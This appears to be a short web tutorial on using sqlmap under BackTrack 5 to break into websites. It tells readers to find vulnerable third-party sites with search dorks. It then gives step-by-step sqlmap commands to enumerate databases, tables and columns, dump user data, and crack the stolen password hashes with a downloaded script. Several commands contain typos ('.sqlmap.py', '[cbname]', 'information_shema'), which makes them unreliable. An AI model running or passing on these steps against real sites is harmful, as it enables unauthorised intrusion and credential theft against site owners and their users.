Hướng dẫn sử dụng SqlMap Backtrack 5

Bài liên quan

• BT5 On Android
• Dùng backtrack hack win7 64bit

• Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection
• Joomla component com_mydyngallery sql injection

Hi, in this tutorial, I’ll be showing you a simple SQL Injection using BackTrack 5.

Quote:

[dbname] = Database name; [tbname] = Table name; [cmname] = Column name.

1. Open up sqlmap


2. One we load the terminal, we wanna find a vunerable site.
Use any dork or check any posted vulns 3. Now, it’s time for the codes

Quote:

./sqlmap.py -u website.com/index.php?id=? --dbs

With this command, you’ll be able to extract the databases.
Looks like this:

3. Once we have the DBS, it’s time to get the tables.

Quote:

./sqlmap website.php/index.php?id=? -D [dbname] --tables

4. After we get the tables which looks like this:

We need to get the columns.
Now, we need to write:

Quote:

.sqlmap.py -u website.com/index.php?id=? -D [dbname] -T [tbname] --columns

5. Once we get the columns

Quote:
We need to dump the files.

.sqlmap.py -u website.com/index.php?id=? -D [dbname] -T [tbname] -C [cbname] --dump

Example .sqlmap.py -u website.com/index.php?id=? -D information_shema -T users -C username --dump
6. After we do this, we will get encrypted password.
How to decrypt!?
You can decrypt online, or using the aforementioned hash.py.
How to use Hash.py!?
Download link for Hash.py

http://uploading.com/ee6e71ed/hash-py

1. Move it to /root
2. Open up your BT5 Terminal
3. Locate your file, in our case /root/hash.py

Quote:

/root/hash.py

We have Online & Offline attack methods.
If you wanna use the offline method, you need a wordlist.